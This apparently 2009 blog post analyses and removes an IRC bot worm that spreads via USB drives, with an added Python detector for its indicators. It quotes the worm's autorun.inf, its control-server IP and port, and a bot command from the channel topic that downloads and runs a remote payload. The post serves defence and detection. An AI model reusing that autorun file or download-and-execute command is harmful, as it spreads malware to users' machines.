Mar 2, 2009

Remove IRC Bot spreading via Flash Disk

Symptoms:-

1. P:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\isei32.exe (Removable Disk)
2. Other process names: werasd.exe, wejhjkkkl.exe (archive file), isei32.exe, 2w.exe, one.jpg
3. Connects to :- 208.99.193.130
4. Folder icon in place of drive icon in My Computer.
5. Autorun.inf
[autorun]
open=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\isei32.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\isei32.exe
shell\open\default=1
6. Outbound traffic: 208.99.193.130:6667


PASS sock
NICK fdqlte
USER okfrpc "" "wao" :okfrpc

:Irc.WoLF.Net NOTICE AUTH :*** Looking up your hostname...
:Irc.WoLF.Net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:Irc.WoLF.Net 001 fdqlte
:Irc.WoLF.Net 002 fdqlte :               M0dded by uNkn0wn Crew            
:Irc.WoLF.Net 003 fdqlte
:Irc.WoLF.Net 004 fdqlte :          www.uNkn0wn.eu - iD@uNkn0wn.eu         
:Irc.WoLF.Net 005 fdqlte
:Irc.WoLF.Net 005 fdqlte
:Irc.WoLF.Net 005 fdqlte
:Irc.WoLF.Net 422 fdqlte :MOTD File is missing
:fdqlte MODE fdqlte :+iR

JOIN #us# us..

:fdqlte!okfrpc@myIP JOIN :#us#
:Irc.WoLF.Net 332 fdqlte #us# :.kktt http://allmobile.dp.ua/one.jpg c:\emwqnmnmwwlj.exe 1
:Irc.WoLF.Net 333 fdqlte #us# A 1236188567

00000000  6B C4 E8 1E FF EF 4B A8  D5 D8 6B F2 1D 95 F4 45   k.....K. ..k....E
00000010  3E 27 EE 4F FE F4 38 1A  84 97 3F 31 5A 18 36 A8   >'.O..8. ..?1Z.6.
00000020  FB FE CB 6E 48 3B 2F 50  52 49 56 4D 53 47 20 23   ...nH;/P RIVMSG #
00000030  75 73 23 20 3A 53 75 63  63 65 73 73 2E 0D 0A      us# :Suc cess...

00000000  3A 49 72 63 2E 57 6F 4C  46 2E 4E 65 74 20 34 32   :Irc.WoL F.Net 42
00000010  31 20 66 64 71 6C 74 65  20 6B C4 E8 1E FF EF 4B   1 fdqlte  k.....K
00000020  A8 D5 D8 6B F2 1D 95 F4  45 3E 27 EE 4F FE F4 38   ...k.... E>'.O..8
00000030  1A 84 97 3F 31 5A 18 36  A8 FB FE CB 6E 48 3B 2F   ...?1Z.6 ....nH;/
00000040  50 52 49 56 4D 53 47 20  3A 55 6E 6B 6E 6F 77 6E   PRIVMSG  :Unknown
00000050  20 63 6F 6D 6D 61 6E 64  0D 0A                      command ..
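As an added example (not part of the original post), the Python below turns the two indicators described above into defender-side checks: an autorun.inf whose open= and shell\open\command= entries launch a payload from a SID-named RECYCLER folder with the icon swapped for the folder icon, and an IRC RPL_TOPIC (332) line whose topic pairs a URL with a local .exe path, which is how the #us# topic above hands the bot its download-and-run order. The sample autorun.inf and topic line are copied from this write-up; the function names are my own.

```python
import re
# Constructed sample: the autorun.inf listed under symptom 5 above.
AUTORUN_INF = """[autorun]
open=RECYCLER\\S-1-5-21-1482476501-1644491937-682003330-1013\\isei32.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
action=Open folder to view files
shell\\open=Open
shell\\open\\command=RECYCLER\\S-1-5-21-1482476501-1644491937-682003330-1013\\isei32.exe
shell\\open\\default=1
"""
# Constructed sample: the channel-topic line (numeric 332) from the capture above.
IRC_LINES = [
    ":Irc.WoLF.Net 332 fdqlte #us# :.kktt http://allmobile.dp.ua/one.jpg c:\\emwqnmnmwwlj.exe 1",
]
# Payload kept in a SID-named folder under RECYCLER, which Explorer hides by default.
RECYCLER_SID = re.compile(r"recycler\\s-1-5-\d+(?:-\d+)+\\[^\\]+\.exe$", re.I)
# Numeric 332 (RPL_TOPIC): ":<server> 332 <nick> <channel> :<topic>"
RPL_TOPIC = re.compile(r"^:\S+ 332 \S+ (#\S+) :(.*)$")
def parse_autorun(text):
    """Return {key: value} for an autorun.inf; keys lower-cased, [section] lines skipped."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        entries[key.strip().lower()] = value.strip()
    return entries

def autorun_findings(text):
    """List which of the write-up's autorun.inf indicators are present."""
    e = parse_autorun(text)
    findings = []
    for key in ("open", "shell\\open\\command"):
        if key in e and RECYCLER_SID.search(e[key]):
            findings.append(f"{key} launches a payload from a RECYCLER SID folder")
    # shell32.dll icons 3 and 4 are folder icons: the drive masquerades as a folder
    if re.search(r"shell32\.dll,[34]$", e.get("icon", ""), re.I):
        findings.append("icon replaced with the folder icon")
    return findings

def irc_findings(lines):
    """Flag channel topics that pair a URL with a local .exe path (download-and-run order)."""
    findings = []
    for line in lines:
        m = RPL_TOPIC.match(line)
        if m and re.search(r"https?://\S+", m.group(2)) and ".exe" in m.group(2).lower():
            findings.append(f"topic of {m.group(1)} carries a download-and-execute command")
    return findings
```

Feed it the autorun.inf from any removable drive and the raw lines of a port 6667 capture; a clean drive and a normal topic produce empty lists.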

Removal Instructions:-

1. Boot into Safe Mode.
2. Use Autoruns to disable the following entries from startup:

Startup Entries:-

-HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ISPSERVICE mIRC    mIRC Co. Ltd.    c:\windows\system32\werasd.exe   

-HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components
n/a Microsoft    Coded yardim60    c:\recycler\s-1-5-21-1482476501-1644491937-682003330-1013\isei32.exe

3. Delete the following files:
c:\recycler\s-1-5-21-1482476501-1644491937-682003330-1013\isei32.exe
c:\windows\system32\werasd.exe
C:\WINDOWS\system32\mirc.ini
C:\WINDOWS\system32\djkems
C:\WINDOWS\system32\wqsead (usernames)
C:\WINDOWS\system32\jewkqljlsd.sys
C:\WINDOWS\hidewin.exe
C:\WINDOWS\system32\mIRC32.exe
C:\WINDOWS\system32\852.reg (the name is three random numbers)
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ISPSERVICE"="C:\\WINDOWS\\system32\\werasd.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\command
"C:\WINDOWS\system32\werasd.exe"

%AppData%\Microsoft\Crypto\RSA\S-1-5-21-1960408961-1614895754-725345543-1004

Detected as:-
1. riskware not-a-virus:Client-IRC.Win32.mIRC.603 File: C:\werasd.exe
2. not-a-virus:RiskTool.Win32.HideWindows
3. BackDoor.Ircbot.FTF (AVG)

Kaspersky doesn't detect isei32.exe, while the other files are not detected if Settings >> Threats and Exclusions >> PDS is switched off.